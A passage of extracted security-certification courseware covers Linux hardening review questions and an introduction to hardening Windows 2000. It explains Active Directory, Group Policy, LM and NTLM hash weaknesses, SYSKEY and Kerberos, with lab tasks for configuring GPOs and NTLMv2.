You do not want to apply some of the possible settings as this may have anadverse effect on your ability to participate in later exercises that use Linux.

9. Close all windows.

SummaryIn this lesson, you examined the fundamentals of Linux operation. You cre-ated files and directories, and configured the security on them. Youexamined how the system secures passwords by using the shadow passwordfile. You secured access to services, using TCP wrappers and xinetd. Youalso examined the security of several network services, and the lesson endedwith the use of Bastille for final system hardening.

Lesson Review3A What is the command to view the contents of a directory?

The ls command.

By default, a new user account has a UID of at least what?

500.

What is the default UID for the root account?

0.

232 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 286: SCNP Hardening

3B What is the octal permission for the setting of rwx?

7.

What is the command to change ownership of an object?

The chown command.

What is the umask value if permissions are set to 000?

777.

Are the number of days to a password change stored in the /etc/passwdor the /etc/shadow file?

In the /etc/shadow file.

3C What are the two configuration files used by TCP wrappers to controlaccess?

The /etc/hosts.deny and /etc/hosts.allow files.

What is the configuration file that controls xinetd?

The /etc/xinetd.conf file.

In xinetd, what line will grant access from the network host 10.20.23.45?

only_from 10.20.23.45

3D In NFS, what line will export the /tech directory to 10.20.30.41 with readand write access?

/tech 10.20.30.41(rw)

In NFS, what line will export the /policy directory to the 10.20.30.0/24network with read-only access?

/policy 10.20.30.0/24(ro)

Why must you watch for a space in the configuration lines of an NFSexport?

The space can change the meaning of the command. For example, a spacebetween the host and permissions can change the permissions to becomeworld-writeable.

What is the name of Samba’s primary configuration file?

Smb.conf.

3E To add a password during system startup, what file do you need tomodify?

The /etc/lilo.conf file.

What is the GUI tool to use to find services on the system?

The Service Configuration tool.

What is the GUI tool to use to view the /var/log files?

The Log Viewer tool.

Lesson 3: Hardening Linux Computers 233

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 287: SCNP Hardening

What is the name of the text file that Tripwire reads to create its policyfile?

The file is named twpol.txt.

What is the name of the perl script that will attempt to reverse changesthat Bastille has made to a system?

The file is named undo.pl.

234 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 288: SCNP Hardening

Hardening WindowsComputers

OverviewIn this lesson, you will investigate the concepts and procedures required tosecure Microsoft Windows computers. You will examine everything fromthe basic principles of Windows NT security, up to the advanced issues ofsecuring a Windows 2000 machine running Active Directory.

ObjectivesIn this lesson, you will:

4A Examine the concepts of Windows 2000 infrastructure security.

You will create a custom GPO and edit it to use in the securing of theWindows 2000 infrastructure.

4B Examine the fundamentals of authentication in Windows 2000.

You will describe the local logon process in Windows 2000.

4C Implement Windows 2000 security configuration tools.

You will implement and examine security templates, secedit.exe, and usethe Security Configuration and Analysis Snap-in.

4D Secure Windows 2000 resources.

You will examine the security of Windows 2000 resources and configuresecurity settings in the Registry.

4E Configure Windows 2000 auditing and logging.

You will configure auditing and logging on a Windows 2000 computerand analyze Security Log Event IDs.

4F Examine and configure EFS on Windows 2000.

You will examine the components of and implement the Encrypting FileSystem (EFS) on Windows 2000.

4G Examine the methods of securing network communications in a Win-dows 2000 network.

You will examine the systems available to secure network communica-tions in Windows 2000, and you will configure RADIUS and the securingof TCP/IP.

Data FilesNIST2kws.inf

Lesson Time6 hours

LESSON

4

Lesson 4: Hardening Windows Computers 235

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 289: SCNP Hardening

Topic 4AWindows 2000 Infrastructure SecurityFor years, Windows NT 4.0 served its market well. It provided a broad platformfor business functions and gained widespread use and popularity. However, it wasbeginning to show its age, and Microsoft needed to move on. What it moved onto was Windows 2000.

With a completely different approach to managing the network, Windows 2000has some new components that network administrators must get comfortable with.In this topic, you will take a look into these new components and how they tieinto securing both the network itself and resources on the network.

In Windows 2000, if you install multiple computers in a logical group, and theyshare resources with one another, you have created a workgroup. The workgroupis commonly referred to as peer-to-peer networking because every machine is anequal, or peer, to the other. In a workgroup, you can have a server; it is simplyreferred to as a stand-alone server. In this case, there is no controlling securitymechanism to the network, and each machine will use its own local security data-base to control access to resources.

In Windows 2000, a local security database is a list of user accounts and resourceaccess data, located on each local computer. So, if you had a peer-to-peer net-work of 20 Windows 2000 computers, you would have 20 local securitydatabases, one for each machine. Although this works, it is inefficient for man-agement, both of resources and of security.

The major step up in the design of a Windows 2000 network came with the newdomain model of Windows 2000. The multiple domain models of Windows NT4.0 are gone. In place is a design where you still group computers together, butthey are controlled differently.

In a Windows 2000 domain, you have grouped together computers and users whoshare a central directory database. This directory database contains user accounts,security information, service information, and more, for the entire domain. Accessto this directory is based on LDAP. This directory database and its access methodtogether is referred to as Active Directory (AD) and is also referred to as theWindows 2000 directory service (NTDS).

The Windows 2000 domain model governed by AD is a replacement for all thedomain models of Windows NT 4.0. In AD, there are no machines designated asPrimary or Backup Domain Controllers. Instead, every server that will participatein the management of the domain is simply called a Domain Controller, and con-tains a master copy of the directory database. (Domain Controllers must berunning Windows 2000 Server.)

236 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 290: SCNP Hardening

A Windows 2000 domain is not bounded by location or network configuration.Machines that are in a domain can be close together on a LAN—connected viatraditional Ethernet—or far apart over a WAN—connected via fractional T1, E1,or any other WAN technology.

The Active Directory is a database listing of information on each of the objects inthe domain. This information includes how each of these objects will interactwith other objects in the directory.

When you are using Active Directory in Windows 2000, this listing can includeinformation on user accounts, groups, computers, servers, printers, security poli-cies, and more. Active Directory may start out with a small number of objectsand grow to hold thousands to millions of object listings.

Another critical component of Windows 2000 is DNS. The reason this is criticalis the dependence of AD on DNS. Active Directory relies on DNS to provide thenaming information required to locate resources on the network.

In addition to the information mentioned earlier, AD holds the informationregarding access control. When a user logs on to the network, he or she isauthenticated by information that has been stored in the Active Directory. When auser attempts to access an object, the information required to authorize suchaccess is also stored in the Active Directory, and is called the DiscretionaryAccess Control List (DACL).

Active Directory objects themselves can be organized into what are known asclasses. Classes represent a logical grouping of objects, at the discretion of theadministrator. Object class examples include user accounts, computers, domains,groups, and Organizational Units (OUs). You also have the ability to create con-tainers, which can hold other objects. A container is an object that is able to holdcomputers, users, and/or other objects.

Active Directory ComponentsIn Windows 2000, there are several critical components that make up a successfulnetwork implementation of Active Directory. These components are logical innature and have no boundaries. They are domains, forests, trees, and Organiza-tional Units (OU). The components of AD that are more physical in nature arethe domain controllers and sites (IP subnets that identify physical networksegments). The functionality of AD separates the physical from the logical net-work structure.

Active Directory Logical StructureOne of the benefits to Active Directory is the ability to build a logical networkthat mirrors the logical structure of the organization. Using this logical structureis more intuitive to users, as they are able to find and identify resources by logi-cal name, without having to have any knowledge of the physical layout of thenetwork.

The main component behind the structure of Active Directory is the domain. AWindows 2000 AD domain is comprised of at least, but is not limited to, onedomain. Microsoft has termed the objects stored inside a domain as interesting.These interesting objects are defined as those objects which a user needs in the

WAN:(Wide Area Network) Aphysical or logical networkthat provides capabilities fora number of independentdevices to communicate witheach other over a commontransmission-interconnectedtopology in geographic areaslarger than those served bylocal area networks.

Lesson 4: Hardening Windows Computers 237

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 291: SCNP Hardening

course of doing his or her job function. Examples of interesting objects includeprinters, databases, email addresses, other users, and more. Each domain holdsinformation about all of the objects in the domain, and only those objects thatbelong to the domain. Domains are allowed to span one or more physicallocations.

Figure 4-1: A graphical example of the logical network layout of a Windows 2000 ActiveDirectory network.

The domain itself is used as a boundary by which security controls can be inplace. The Access Control List (ACL) is used to regulate specific access todomain objects, such as shared folders, for defined users. The ACL contains thepermissions that are used to grant or deny access for an object, such as a user orgroup, to another object, such as a file, folder, or printer.

Within a domain itself you can have Organizational Units, or OUs. An OU is alogical holder that is used to further mirror the logical structure of theorganization. An OU can contain users, groups, shared folders and printers, andeven other OUs from the same domain. Every domain in the network can have aunique OU configuration—there is no dependency on other domains.

Security policies and policies concerning computer and user behavior (GroupPolicies) can be assigned to a stand-alone computer, a site, a domain, or an OU,as appropriate. It is possible to assign policies to each OU, but it is not requiredthat you do so. If there is a policy that you want all of the OUs in the network touse, you can assign it to the parent OU or to the domain, because the defaultbehavior is to allow child objects to inherit policies from their parents within the

Logical Layout of aWindows 2000 Active

Directory Network

238 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 292: SCNP Hardening

Active Directory. Another important item to note is that these Group Policies arethemselves objects in AD; therefore, permissions can be assigned to them. For apolicy to take effect upon an object, that object should have at least the Read andApply Group Policy permissions for that policy.

Figure 4-2: A logical view of the objects an OU can contain.

Another new concept in Windows 2000 is that of forests and trees. A tree is alogical structure, created by the network design team, of one or more Windows2000 domains that share a namespace. The domains fall in a hierarchical structureand follow DNS naming standards. As shown in Figure 4-3, child domains ofSecurityCertified.Net use the parent names in their naming structure.

Figure 4-3: A domain tree for Windows 2000 using DNS naming standards.

Possible OU Contents

Domain Trees Use DNSNaming

Lesson 4: Hardening Windows Computers 239

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 293: SCNP Hardening

In the Windows 2000 Active Directory structure, a forest is a collection of one ormore independent domain trees. These independent trees are linked together witha trust, which will be defined in a moment. Each tree in the forest maintains itsproper DNS naming system, and there is no requirement for any similarnamespace from one tree to another. Each domain still functions on its own, butthe logical connection of the forest enables enterprise-wide communication on thenetwork. The new Windows Server 2003 (.NET) architecture will take this onestep further—trusts can be implemented between forests to create a Federation.Figure 4-4 shows a forest of two trees.

Figure 4-4: Two unique domain trees tied together to make a forest.

The implementation of trust in a Windows 2000 Active Directory network isquite different from the Windows NT 4.0 implementation. In Windows 2000, alltrusts between domains are, by default, two-way transitive trusts. These trusts,based on Kerberos version 5, are created automatically when a new domain isadded to the tree. The domain that started the tree is considered the root domain,and each subsequent domain will form a two-way transitive trust upon joining thetree. It is due to this trust that users and computers from any domain are able tobe authenticated at any other domain in the tree or forest. (The authorization isbased on setting the appropriate permissions to do so.)

When older Windows domains are on the network, such as Windows NT 4.0domains, a specific trust can be created. This is called an explicit one-way trust,and it is nontransitive. This way, a Windows 2000 network, running Active Direc-tory, can have communications with an older Windows NT 4.0 domain.

Another option for manually creating trusts is to connect two Windows 2000domains that are far down the trees of different forests. This can help to speed upcommunication between the two domains. These are known as shortcut trusts.

While discussing trust, one interesting thing to note, from a security profession-al’s perspective, is how an attacker can take advantage of trust with only a roguelaptop running a Windows NT 4.0 domain and a network connection to a defaultinstallation of a Windows 2000 domain. Such a rogue machine can offer its trustto the Windows 2000 domain and obtain the complete list of users and groupsfrom the Windows 2000 domain without any authentication whatsoever. However,this vulnerability has been addressed in the Microsoft Security Rollup package.

Two Domain Trees Linkedto Make a Forest

A transitive trust means thatif Domain C trusts Domain

B, and Domain B trustsDomain A, then Domain C

also trusts Domain A.

240 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 294: SCNP Hardening

Active Directory Physical StructureAlthough the majority of the design and implementation of the Active Directorynetwork is on the logical side, the physical side must also be addressed. The maincomponents of the physical side of Active Directory are sites, the links betweenthe sites, and the Domain Controllers.

The site, as defined by Microsoft, “is a combination of one or more Internet Pro-tocol (IP) subnets connected by a highly reliable and fast link to localize as muchnetwork traffic as possible.” A fast link is generally referred to when the connec-tion speed is at least 512 Kbps. In other words, the site is designed to mirror thephysical structure of your network and may or may not be made up of differentIP subnets.

Remember that the domain is designed to mirror the logical needs of the networkand apply that same logic to designing a network using physical aspects. There isno correlation between the site and the domain. It is possible to have multipledomains in a site, and it is possible to have multiple sites for one domain.

A site is also not part of the DNS namespace. This means that when browsing thedirectory, you will see user and computer accounts managed by domain and/orOU, but not by site. The only thing a site contains is Computer objects andobjects relevant to the connection and replication from one site to another.

The other component of the physical makeup of Active Directory is the actualDomain Controllers (DCs) themselves. These machines, which must be runningWindows 2000 Server, each have an exact replica of the Domain Directory. Infact, when making a change on a DC that has an effect on the Active Directory,all other DCs will receive this replicated change. Because any domain controllercan authenticate a user to the network, each controller is required to have thisDirectory. The basic breakdown of the Domain Controller in terms of what it pro-vides to the network is:

• Each DC stores a copy of Active Directory information that is relevant tothat domain (also referred to as an AD partition).

• Each DC replicates changes, at admin-defined intervals, to all the other DCsto ensure a consistent view of the network.

• Each DC replicates critical changes to all the other DCs immediately.

• Each DC is able to authenticate user logon requests.

Windows 2000 DNSIn order for the Active Directory to function in any capacity, DNS must be run-ning for the network. The implementation of the DNS namespace will be thefoundation on which the AD namespace is built. By following this procedure, youare able to have fluid IP communication, using names that users are familiar withacross the network and on the Internet.

A new feature of Windows 2000 is Dynamic DNS (DDNS). DDNS enables cli-ents that receive their IP addresses automatically (via a DHCP server) to havetheir names and IP addresses registered with the network. With a DDNS serverrunning in the network, the client machines will automatically communicate withthe server, announcing their name and address combinations, and will updateDNS information with no user intervention required.

Lesson 4: Hardening Windows Computers 241

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 295: SCNP Hardening

One of the advantages to running DDNS in a network is the ability to eliminateother protocols and services that might be running in order to locate resources.For example, the Windows Internet Name Service (WINS) of Windows NT 4.0 isno longer required, and the use of NetBEUI as a communication protocol is nolonger required, but might be needed to provide backward compatibility.

Group Policy ComponentsThe final component of the Windows 2000 infrastructure we are going to discussis the group policy. A group policy is a logical grouping of user and computersettings that can be applied to computers, domains, OUs, and sites. For example,you can configure a group policy setting to remove objects from the Start menu.

When you configure group policy settings, they are placed in what is called aGroup Policy Object, or GPO. The GPO is then responsible for controlling theapplication of the policy to Active Directory objects, such as sites, OUs, anddomains. Once a GPO is configured, it is applied to the AD object as assigned,and by default, the policy will affect all computers that are in the AD object.

Having the policy affect all computers may not be your desired result, so you dohave the ability to filter how the policy will be implemented for computers andusers. The filtering will use Access Control Lists (ACLs), as designed by you.

Some of the rules for applying a GPO are as follows:

• A GPO can be associated with more than one domain.

• A GPO can be associated with more than one OU.

• A domain can be associated with more than one GPO.

• An OU can be associated with more than one GPO.

As you can see, you are allowed a lot of flexibility in GPO implementation.However, before getting too far into the implementation, you must take a stepback and look into the GPO itself in more detail.

Group Policy ImplementationTo start with the configuration of a GPO, you must open and use the GroupPolicy Editor. As with most of the management options in Windows 2000, thiscan be opened via the Microsoft Management Console (MMC).

In the Group Policy Editor, you are presented with two parent objects to manage,User Configuration and Computer Configuration. This is where you will createthe GPOs that you will later apply as per your requirements.

• The Computer Configuration node provides the option to manage the behav-ior of the operating system, account policies, IP security policies, and more.

• The User Configuration node provides the option to manage behavior that isunique to the user, such as Desktop settings, Control Panel settings, Startmenu settings, and more.

242 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 296: SCNP Hardening

TASK 4A-1Configuring a Custom MMC and GPO

1. Boot your computer to Windows 2000, and log on as Administrator.

2. From the Start menu, choose Run and enter mmc into the Run dialog boxto start the default Microsoft Management Console.

3. Choose Console→Add/Remove Snap-In.

4. Click the Add button.

5. Scroll down in the list, select Group Policy, and click Add. You will beasked to select the location for the Group Policy Object.

6. Leave the GPO selection of storing on the local computer, and clickFinish.

7. Click Close, and then click OK to close the Add/Remove Snap-in window.

8. Choose Console→Save, and save this console as Custom_GPO. The newConsole object you created will now be available in your AdministrativeTools and can be accessed through the Start menu. You might also want tocreate a shortcut to it on the Windows Desktop.

Editing GPOsOnce you have created GPOs, you can edit and further customize them. Bear inmind that GPOs themselves are AD objects. Therefore, you can make copies ofGPOs, not actually apply them but save them to a file, and email them to anotheradministrator in your company and have him tweak it further for the task at hand.In the following task, you will edit your GPO to control password settings in thedomain.

Lesson 4: Hardening Windows Computers 243

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 297: SCNP Hardening

TASK 4A-2Editing a GPO

Setup: You are logged on to Windows 2000 as Administrator, and theCustom_GPO console is running.

1. Expand Local Computer Policy.

2. If necessary, expand Computer Configuration.

3. Expand Windows Settings.

4. Expand Security Settings.

5. Expand Account Policies, select Password Policy, and double-click theEnforce Password History option.

6. For the number of passwords to remember, enter 5 and click OK.

7. Right-click the Maximum Password Age option and choose Security.

8. For the maximum age of passwords, enter 30 days and click OK.

9. If you are prompted to change related values, click OK to reset the Mini-mum Password Age.

10. Observe the console. The Local Settings you just adjusted are different thanthe currently effective (default) settings. However, if you close and reopenthe GPO, the altered settings will become the effective settings.

11. Close the Custom_GPO without saving settings, and then reopen it.Verify that the local and effective settings match.

Enforcing GPOsOnce you create and edit a GPO, it must be enforced to have any effect on thenetwork. As discussed, there can be GPOs on sites, domains, and OUs, so beingaware of the order of implementation is critical to proper GPO deployment.

1. The first GPO that is processed is the local GPO. Every Windows 2000computer has a GPO stored locally. Although this is the first GPO processed,

244 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 298: SCNP Hardening

it is not practical to implement custom configurations on each machine onthe network, so often administrators move right past the local GPO.

2. After the local GPO is processed, the site GPO is implemented. Becausethere can be multiple GPOs for one site, it is up to the administrator todefine the order of implementation, which is done in the Site Properties.

3. Once the site GPO has been processed, the domain GPO is implemented.Just as there can be multiple GPOs for a site, there can be multiple GPOsfor a domain, so the administrator must take care to define the order ofimplementation here as well.

4. The final GPO to be processed is the OU GPO. Again, as in the other imple-mentations, more than one GPO may be present for the OU, and, as such,the administrator is required to properly plan and implement the GPOs asdesired.

In each location (site, domain, or OU) where there can be more than one GPO,the place to modify the GPO order is in the Properties of the location. Forexample, in the Site Properties, when multiple GPOs are listed, the option tomove them Up or Down is present. The system will process the GPOs highest onthe list as having the highest priority, taking precedence over GPOs that are loweron the list.

Knowledge of the implementation order of the GPOs is critical for anyone whoworks to secure and manage a Windows 2000 network. By looking at the imple-mentation order, you can identify that if a site GPO was defined to disable theRestrict CD-ROM Access To Locally Logged-on User Only, and the domain GPOwas to define that same setting as Enabled, then the settings for computersbelonging to that site and domain would be enabled, as the domain GPO wasprocessed after the site GPO.

TASK 4A-3Implementing Multiple GPOs

Objective: To examine the impact of implementing GPOs at different lev-els and to determine the final policy settings that will be ineffect.

1. You have been assigned to define Internet Explorer settings for users inyour enterprise, and you decide to experiment with defining GPOs atvarious levels. If you define the following GPOs, what will the finalresult be when a user in this OU logs on and runs IE?

• At the site level, the Configure Toolbar Buttons policy is to be Enabled,and the Show Back Button and Show Home Button options arechecked.

• At the domain level, the Configure Toolbar Buttons policy is to beEnabled, the Show Back Button option is unchecked, and the ShowStop Button option is checked.

• At the OU level, the Configure Toolbar Buttons policy is to be Enabled,the Show Search Button and Show History Button options are checked.

The user will see the Home, Stop, Search, and History buttons.

If students are interestedand time permits, youmight want to demonstratethe GPO implementationshown here so thatstudents can see theresulting policy settings. Ifso, you will need to rundcpromo to install ActiveDirectory.

Lesson 4: Hardening Windows Computers 245

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 299: SCNP Hardening

Topic 4BWindows 2000 AuthenticationDespite all the advancements and new components of Windows 2000, one thingremains the same: a user must be authenticated to access resources on thenetwork. Where Windows 2000 starts to look new in comparison with earlier ver-sions is with the methods of authentication that it can use. Windows 2000 can useany of the following for authentication: Kerberos, NTLM, NTLMv2, LM,RADIUS, SSL, Smart Cards, and more.

Windows 2000 uses what is called the Security Support Provider Interface (SSPI)to allow for these methods of authentication. The SSPI functions between theuser applications, such as the Web browser, and the authentication method, suchas NTLM or Kerberos. This means that an application developer need not createan application for each type of authentication, but rather can create one applica-tion that can communicate with SSPI.

Although the SSPI plays an important function in the authentication of users, it isnot something that administrators spend time with, as there are no options forconfiguration or management involved in the SSPI. It simply sits and performs itsjob of connecting authentication requests to the authentication provided by thesystem.

Where the authentication process starts to involve the administrators more is inthe security architecture of Windows 2000. The security architecture of Windows2000 is comprised of parts of both the operating system and Active Directory. Forexample, account information and policy settings are stored in AD, while the OSholds the security process that is implemented and information regarding trusts toand from other areas of the network.

If you have installed a new Windows 2000 domain, and all machines are runningWindows 2000, the default method of authentication is Kerberos. You can, ofcourse, change the authentication method, but the default will be Kerberos.

If you have installed a new Windows 2000 domain, it is in what is called mixedmode. In a mixed-mode network, there can be both Windows NT 4.0 BDCs andWindows 2000 domain controllers present. This allows for maximum communica-tion options over the network, but does not present the most secure environment,because you must support authentication options for two systems.

Authentication MethodsIn earlier OSs—before Windows NT 4.0, with Service Pack 4 (SP4)—there wereonly two supported methods of what is called challenge/response authentication.Those two methods were LAN Manager (LM) and Windows NT LanMan(NTLM). Windows 2000 has increased the security by adding NTLMv2.

SSL:(Secure Sockets Layer) A

session layer protocol thatprovides authentication and

confidentiality toapplications.

security architecture:A detailed description of all

aspects of the system thatrelate to security, along witha set of principles to guide

the design. A securityarchitecture describes how

the system is put together tosatisfy the security

requirements.

246 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 300: SCNP Hardening

LM AuthenticationIn order to provide maximum compatibility, the ability to communicate with oldersystems is a requirement. If the older systems are using LAN Manager authenti-cation, this can introduce a vulnerability to the network.

LM authentication uses a password that is based on the standard character set.This means that no special characters can be included in passwords, which is anobvious weakness. Additionally, the passwords are not case-sensitive. A passwordcan be typed in upper- and lower-case letters, but the system will always convertthe letters to all upper case—again an obvious weakness.

In the Windows systems, passwords are not stored or visible anywhere in theirplaintext versions, for good reason. Instead, they are stored as hashes, or one-wayencrypted character sets that represent the passwords. The way that an LM hashis created also presents a potential weakness. The LM password can be a maxi-mum of 14 characters.

The computer will take the 14-character, all-upper-case password and split it intotwo 7-character chunks. Each character space is one byte, so in essence there arenow two 7-byte values. Each 7-byte value is used as the key for DES to encrypta 64-bit constant value. The output of the encryption on both sides creates aunique value. These two values are then listed next to one another to provide thefinal hash value. Figure 4-5 shows this process.

Figure 4-5: The generation of an LM hash.

vulnerability:Hardware, firmware, orsoftware flow that leaves anAIS open for potentialexploitation. A weakness inautomated system securityprocedures, administrativecontrols, physical layout,internal controls, and soforth, that could be exploitedby a threat to gainunauthorized access to anAIS.

The Generation of an LMHash

Lesson 4: Hardening Windows Computers 247

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 301: SCNP Hardening

Once the hash value has been calculated, you can look at it and see a long stringof characters, thinking it looks secure. But, the weaknesses of LM hashingbecomes quickly apparent. The first issue is the character set. Because only stan-dard characters can be used, the character set is limited to 26 letters and 14characters, or a full password space that is 2614, or approximately 1019. This is astring of 65 bits that would need to be cracked.

However, the second issue of the split in the password comes quickly into play.In the previous example, the password was split into two chunks, MYPASSWand ORDISLO. These two chunks can be attacked at the same time. So, the pass-word space is actually 267+267, or approximately 1010. This is now a full stringof only 32 bits to crack, and each half can be cracked at the same time, reducingthe bit space further.

The second half of the password will generally be attacked first. This is due tothe fact that most people do not use a password that is a full 14 characters. So, incracking this half, there may be fewer calculations to make. Secondarily, the char-acters that are cracked can reveal clues as to the first half of the password.

NTLM AuthenticationWhen Microsoft was developing Windows NT, an opportunity was made toimprove on the weaknesses of LM authentication. The result was the WindowsNT LAN Manager (NTLM) Authentication method.

A primary enhancement that NTLM offered over LM was that the character setcould now include the full Unicode set. This allowed for characters outside ofletters and allowed for upper- and lower-case letters. This was a significantimprovement. The password was now seen to the system as 14 16-bit Unicodecharacters.

The 14 characters were then converted into a 128-bit hash value by using Mes-sage Digest #4 (MD4), developed by Ron Rivest. This is what is commonlyreferred to as the NTLM hash. Figure 4-6 shows the generation of an NTLMhash.

Figure 4-6: The generation of an NTLM hash.

Although having a full 128-bit character space to attack provides better protectionagainst attacks, there is an issue with the implementation of the new NTLM inWindows. In order for Windows to remain backward-compatible, it was decidedto provide an equivalent LM hash. This would allow newer Windows computersto communicate with older systems.

The Generation of an NTLMHash

248 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 302: SCNP Hardening

Because Windows stores the NTLM and LM values for each user, an attackerwill work on cracking the LM hash first. Once that is recovered, the attacker canrun a simple brute-force test to determine the case-sensitivity of the letters found.The NTLM and LM values are found stored in the Windows Registry in theSAM.

NTLMv2NTLMv2 was introduced in the continuing line of evolving authentication.NTLMv2 allows for control over the use of traditional LM by the client and theserver. Additionally, NTLMv2 uses MD5 to create the hash. The 128-bitNTLMv2 also provides session confidentiality and integrity. In the event thatNTLMv2 is used where the United States Export Restrictions are not met, it willbe installed in 56-bit mode.

The addition of the controls on the backward-compatible features of LM is a sig-nificant improvement to the security of the network. Figure 4-7 shows where thesettings of the authentication options are made.

Figure 4-7: Local Security Policy options for authentication.

SYSKEYWindows stores both the LM and NTLM hashes in the Registry. This is yetanother reason for proper security controls on Registry access. However, if theSAM can be pulled off the computer, from a Recovery Disk, or if the SAM canbe dumped from the Registry using software, extra security is required.

Microsoft introduced a means of securing the SAM called System Key, orSYSKEY for short. SYSKEY uses a secret 128-bit key to provide encryption onthe SAM database, making it more difficult to pull the hashes off a disk andcrack them. SYSKEY needed to be added to a Windows NT system and isincluded in Windows 2000 by default.

Lesson 4: Hardening Windows Computers 249

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 303: SCNP Hardening

A common question is: “Where do I store, or what do I do with the SYSKEYvalue itself?” The key must be available and must be protected. There are threeoptions for managing SYSKEY on a system:

• Allow the computer to generate a random key as the System Key and storethe key somewhere in the Registry. The key will then be used when the sys-tem restarts, and input from the user who started the system is not required.

• Allow the computer to generate a random key and store the key on a floppydisk. The system will prompt for the disk during startup.

• Create a password and remember the password. Enter the System Key whenprompted during the startup sequence.

The Challenge and ResponseAll of the previous authentication methods discussed so far—LM, NTLM, andNTLMv2—use what is called the Challenge Response authentication. Withoutassigning specific numbers to the sequence of events, the following steps definethe general process of the challenge response system:

1. The client initiates the authentication process by bringing up the logonscreen and requesting to logon.

2. The server sends a random string of characters to the client. This is calledthe challenge.

3. The client enters a username and password. The hash of the user’s passwordencrypts the challenge characters and returns the encrypted value. This iscalled the response.

4. The server encrypts the challenge using the stored hash of the user’spassword. If the server’s value matches the client’s value, the user isauthenticated.

Windows 2000 Local Logon ProcessThere are two methods used when you log on to a Windows 2000 Server or Pro-fessional computer locally. The two authentication methods are Kerberos andNTLM. Kerberos is the main method, and in the event that Windows cannot finda KDC (Key Distribution Center), then Windows will revert to NTLM for authen-tication to the local machine, using the local SAM (Security Accounts Manager)database.

The process of logging on to the local system, using NTLM is:

1. A user enters his or her user name and password. These credentials are col-lected by the Graphical Identification and Authentication (GINA) componentof Windows.

2. GINA hands off the entered information to the Local Security Authority(LSA) for authentication. The LSA is what creates the access tokens, pro-

250 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 304: SCNP Hardening

vides an interactive environment for user authentication, controls the localsecurity policy, and sends authentication requests to NTLM or Kerberos, asrequired.

3. LSA will then hand off the information to the SSPI, which will give theauthentication request to the NT LAN Manager (NTLM) driver, calledMSV1-0 SSP. (At this stage, if Kerberos is being used, SSPI would hand offto Kerberos.)

4. The NTLM driver uses the Netlogon service to authenticate the user creden-tials with the local SAM database.

Kerberos in Windows 2000If you have a Windows 2000 domain up and running, and you want to implementKerberos, all you have to do is—nothing! Kerberos will be used by default toauthenticate network clients (who must be running Windows 2000) logging ontoa Windows 2000 domain.

Kerberos is an IETF standard used for authentication. It was developed by theMassachusetts Institute of Technology during the 1980s. As an authenticationmethod, it is considered to be a secure method and has been implemented in OSsbefore the Windows 2000 implementation. There is a bit of controversy in themethod used in Windows systems, as it varies slightly from the standard createdby MIT. However, it should be noted that Windows 2000 is able to interoperatewith non–Windows 2000 machines running Kerberos.

Although it is beyond the scope of this course to get into the details of Kerberosoperation, you should be familiar with the fundamental issues of its function forauthentication purposes.

When a user begins the logon process by entering their credentials (a usernameand password, a smart card, or biometrics), Windows contacts an Active Direc-tory domain controller and locates the Kerberos Key Distribution Center (KDC).[An Authentication Server (AS) is what performs the actual authentication.] TheKDC responds by issuing a Ticket Granting Ticket (TGT) to the authenticateduser. The TGT contains identification information about this user to various serv-ers on the network and is used to gain further access in the network.

Once the user account has been authenticated, the TGT is used to request furtherKerberos tickets in order to access network services. The machine that providesthe tickets for the network resources to the authenticated client is called a TicketGranting Server (TGS).

To summarize:

• An Authentication Server (AS) is used to perform the actual authenticationof the Kerberos client. In a Windows 2000 implementation, this is config-ured as a service called the Authentication Service.

• The Ticket Granting Server (TGS) is what creates the actual tickets for theclient to use in accessing authorized resources. In a Windows 2000 imple-mentation, this is configured as a service called the Ticket Granting Service.

• The Kerberos Distribution Center (KDC) in a Windows 2000 implementationcontains both the Authentication Service and the Ticket Granting Service.

Lesson 4: Hardening Windows Computers 251

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 305: SCNP Hardening

One of the benefits to end-users of a network running Kerberos is that a SingleSign On (SSO) can be maintained. With SSO, users are not required to authenti-cate with each network resource they want to access, and because Windows 2000trusts are transitive, once a user logs on to one domain he or she will have accessto the other domains in the forest. Another key benefit of Kerberos is that it has amechanism for verifying the identity of the user, not just authentication. Thismeans that in a Kerberos network, if a message says it came from User A, youcan be very confident it did indeed come from User A.

Smart Cards in Windows 2000With the release of Windows 2000, Microsoft included built-in support for SmartCards. Smart Cards allow for a physical component of authentication, which pro-vides an additional layer of defense for the system.

Smart Cards in Windows 2000 utilize Kerberos and public key cryptography.Public key cryptography is asymmetrical cryptography, meaning that there is onekey for encryption and a different key for decryption. When grouped together, thetwo are called the private/public key pair, or simply the key pair. The private keyis known only to the owner and is never shared with the world. The public key isknown to the world; it is publicly available. When Smart Cards are deployed inplace of a password, the key pair is stored on the card.

TASK 4B-1Configuring NTLMv2 Authentication

Setup: You are logged on to Windows 2000 as Administrator, and theCustom_GPO is open.

1. Under Security Settings, expand Local Policies, and select SecurityOptions.

2. Double-click LAN Manager Authentication Level.

